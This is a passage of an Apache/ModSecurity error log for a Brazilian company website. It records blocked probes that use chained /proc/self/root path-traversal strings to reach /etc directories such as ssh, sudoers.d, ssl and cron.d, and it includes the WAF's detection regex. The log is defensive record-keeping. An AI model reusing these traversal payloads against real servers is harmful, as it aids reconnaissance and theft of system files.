<IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/sys/fs/cgroup/systemd/user.slice
[Tue Mar 17 20:40:46.412295 2026] [:error] [pid 29151:tid 140411725141760] [client 74.7.241.31:39342] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmfvPqhzTj3BvfDX-tmQAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:40:48.056925 2026] [:error] [pid 6296:tid 140411649607424] [client 74.7.241.31:35418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmgHIk7brgkOH-rIWx6AAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:40:49.358436 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:35430] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmgda6ubjKNq_cu4YsCAAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:40:50.927277 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:35442] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmgtY0UrI5A3LftIwk6gAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:00.909572 2026] [:error] [pid 25836:tid 140411699963648] [client 74.7.241.31:41536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmjIh-PF_25v4hFRCPuQAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:01.392005 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:48510] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmjdY0UrI5A3LftIwk7QAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:41:03.185435 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.241.31:41552] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmj8df6f5d65gmYZRiCgAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:04.929949 2026] [proxy_fcgi:error] [pid 6296:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:33796] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:41:06.172471 2026] [:error] [pid 2598:tid 140411649607424] [client 74.7.241.31:41558] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmkhj0p0SRWAqcjGGfJAAAAws"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:07.769922 2026] [:error] [pid 16449:tid 140411557287680] [client 74.7.241.31:35196] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmk0eQbjTSjgbmHFr10gAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:09.650650 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.241.31:35212] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmlew_le52K8_3pV1x9AAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:11.287089 2026] [:error] [pid 11816:tid 140411716749056] [client 74.7.241.31:35214] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnml-w_le52K8_3pV1x9wAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:13.287420 2026] [:error] [pid 25836:tid 140411624429312] [client 74.7.241.31:35222] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmmYh-PF_25v4hFRCPvQAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:27.129840 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:34206] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:41:28.540221 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.241.31:46792] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmqMdf6f5d65gmYZRiHwAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:30.038846 2026] [:error] [pid 16449:tid 140411548894976] [client 74.7.241.31:46804] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmqkeQbjTSjgbmHFr14QAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:30.235228 2026] [:error] [pid 16449:tid 140411716749056] [client 74.7.241.31:46804] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmqkeQbjTSjgbmHFr14gAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:31.579040 2026] [:error] [pid 2598:tid 140411582465792] [client 74.7.241.31:46812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmqxj0p0SRWAqcjGGfKwAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:33.110623 2026] [:error] [pid 16449:tid 140411616036608] [client 74.7.241.31:46824] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmrUeQbjTSjgbmHFr15QAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:34.562788 2026] [:error] [pid 6296:tid 140411649607424] [client 74.7.241.31:46836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmrnIk7brgkOH-rIWx8wAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:37.170043 2026] [:error] [pid 2598:tid 140411548894976] [client 74.7.241.31:46852] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmsBj0p0SRWAqcjGGfLgAAAxc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:38.556208 2026] [:error] [pid 6296:tid 140411565680384] [client 74.7.241.31:34616] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmsnIk7brgkOH-rIWx9QAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:40.011079 2026] [:error] [pid 25836:tid 140411632822016] [client 74.7.241.31:34618] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmtIh-PF_25v4hFRCPwgAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
